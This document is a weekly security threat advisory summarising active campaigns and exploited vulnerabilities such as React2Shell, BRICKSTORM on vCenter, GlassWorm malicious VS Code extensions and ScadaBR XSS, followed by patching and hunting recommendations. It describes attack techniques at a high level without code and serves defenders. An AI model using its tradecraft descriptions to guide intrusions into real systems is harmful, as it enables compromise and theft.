Servers Under Siege: React2Shell, BRICKSTORM, GlassWorm & ScadaBR—This Week’s Critical Fixes

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Core-server intrusions move center stage

Attackers are pivoting from end-user endpoints to the heart of enterprise infrastructure—virtualization stacks and internet-exposed Windows servers—where persistence buys long dwell time and broad reach. Tactics blend stealthy persistence, dead-drop C2, and identity abuse to quietly expand control.

• BrickStorm backdoor on VMware vCenter — China-linked actors compromised DMZ web servers, laterally moved into vSphere/vCenter, dropped a Go-based BRICKSTORM implant on ESXi/vCenter, spun rogue VMs, stole snapshots/AD data, and abused ADFS keys for long-term access with encrypted HTTPS/WebSocket/DoH C2 and self-healing persistence.

• PassiveNeuron SQL-path espionage — Opportunistic hits on internet-exposed Windows Server/SQL environments using NeuralExecutor/Neursite loaders, Cobalt Strike, GitHub dead-drops, and Phantom DLL hijacking to persist outside typical autoruns while focusing on government/industrial/financial targets.

2. App-layer RCE goes mass-exploitation

Framework-level flaws that work in default configs are being weaponized within hours, forcing emergency patch cycles and retroactive compromise assessments—patching alone isn’t enough.

• React2Shell zero-day (CVE-2025-55182) — Insecure deserialization in React Server Components’ Flight protocol enables unauthenticated server-side JS execution on many React/Next.js apps; active, hands-on-keyboard exploitation by China-nexus clusters with public PoCs in circulation.

• WordPress plugin criticals — King Addons for Elementor privilege escalation lets anyone self-assign admin via crafted admin-ajax.php; Advanced Custom Fields: Extended RCE abuses call_user_func_array() for unauthenticated code execution—both already exploited in the wild.

3. APT Tradecraft: DNS/AitM & Long-Haul Loaders

State-aligned groups are shifting from simple phish to infrastructure-level hijack and multi-year, low-noise loaders.

• PlushDaemon EdgeStepper — Go backdoor on edge devices hijacks DNS to reroute software updates, delivering LittleDaemon → DaemonicLogistics → SlowStepper for espionage across semiconductor, manufacturing, and academia.
• APT24 “BadAudio” — Heavily-obfuscated DLL loader delivered via watering holes, a Taiwanese JS supply-chain breach, and themed spearphish; AES-encrypted beacons and in-memory payloads (incl. Cobalt Strike) with persistently low AV detection.

4. Developer supply chain under fire (again)

The dev toolchain remains a high-leverage entry point: marketplace trust, auto-updates, and wide blast radius make it ideal for stealthy spread and credential theft.

• GlassWorm returns in VS Code/Open VSX — 24 malicious extensions impersonating popular tools ship Rust implants, resolve C2 via Solana (and even Google Calendar), then use stolen creds to backdoor repos and republish trojanized packages for worm-like propagation across Windows/macOS dev fleets.

5. ICS/OT web layers get picked off

Legacy web panels and default creds on HMI/SCADA are being abused for high-visibility defacement and low-effort disruption, while quietly degrading operator visibility.

• OpenPLC ScadaBR XSS (CVE-2021-26829) actively exploited — TwoNet hacktivists logged in with defaults, injected JS via system_settings.shtm, defaced HMI, and disabled logs/alerts; CISA moved the flaw to KEV amid broader ICS probing and region-focused scans.

Proactive Steps for the Week

Patch/disable now (highest priority)

• React/Next.js: apply vendor fixes for React2Shell; if delayed, temporarily disable RSC Flight endpoints and add WAF rules to block malformed Flight payloads.

• WordPress: update King Addons ≥ 51.1.35 and ACF: Extended ≥ 0.9.2; audit for rogue admin users, unexpected PHP files, and recent admin-ajax.php abuse.

• VMware stack: baseline vCenter/ESXi; hunt for unknown ELF/Go binaries, long-lived outbound HTTPS/WebSocket/DoH from management hosts, rogue VMs/snapshots, and ADFS key export events.

Hunt and contain (next 72 hours)

• Windows Server/SQL: search for Phantom-path DLLs in System32/service paths, suspicious SQL activity (e.g., xp_cmdshell use), Cobalt Strike beacons, and GitHub raw fetches from servers.

• Developer endpoints/CI: enumerate and remove the listed VS Code/Open VSX extensions; rotate GitHub/npm tokens, enforce MFA, and scan for Rust module loads from extension directories.

• ICS/HMI: enforce password changes off defaults, segment panels, add WAF XSS rules for ScadaBR, and enable audit alerts for UI/file changes and log tampering.

Hardening to start this sprint

• Restrict admin access to jump hosts/VPN with MFA; block unsanctioned DoH at egress.

• Implement signed extensions/allow-lists for IDEs; require re-review on marketplace updates.

• For SQL Server, disable unused features (e.g., xp_cmdshell), enforce TLS, and monitor for anomalous admin logins from the internet.

• Add detections for: React RSC anomalies, unexpected node/interpreter spawns under web services, vCenter config changes outside change windows, and cookie- or calendar-based dead-drop patterns.